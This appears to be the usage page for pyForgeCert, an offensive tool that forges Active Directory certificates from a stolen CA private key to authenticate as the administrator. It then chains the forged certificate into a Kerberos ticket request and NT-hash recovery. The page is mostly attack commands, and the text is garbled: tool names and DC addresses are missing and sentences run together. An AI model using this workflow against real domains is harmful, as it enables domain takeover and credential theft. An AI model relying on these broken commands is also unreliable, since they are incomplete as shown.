pyForgeCert is a Python equivalent of the original ForgeCert written in C#.



optional arguments:
  -h, --help            show this help message and exit
  -i INPUT, --input INPUT
                        Input file, default (PEM).
  -p IPASSWORD, --ipassword IPASSWORD
                        Password to the CA private key file.(PFX file).
  -s {User,Computer}, --subject {User,Computer}
                        Subject name in the certificate.
  -a ALTNAME, --altname ALTNAME
                        UPN of the user to authenticate as.
  -o OUTPUT, --output OUTPUT
                        Path where to save the new .pfx certificate.
  -op OPASSWORD, --opassword OPASSWORD
                        Password to the .pfx file.
  -c CRL, --crl CRL     Ldap path to a CRL for the forged certificate.
  -pfx                  If the input file is PFX.

Using PEM

python -i cert.pem -o admin.pfx

Default SubjectAltName is administrator, if you want to change it, use -a.

Using PFX

python -i cert.pfx -o admin.pfx -pfx -p 123

Once you get the new pfx, a TGT can be request with The NT hash can then be recovered with

python tools/ -cert-pfx admin.pfx -pfx-pass 123 -dc-ip admin.ccache

python tools/ -dc-ip -k 62bcb453bb21d4f8dd04492dd01d61137cb95367ca7e47587251e0563e6460f7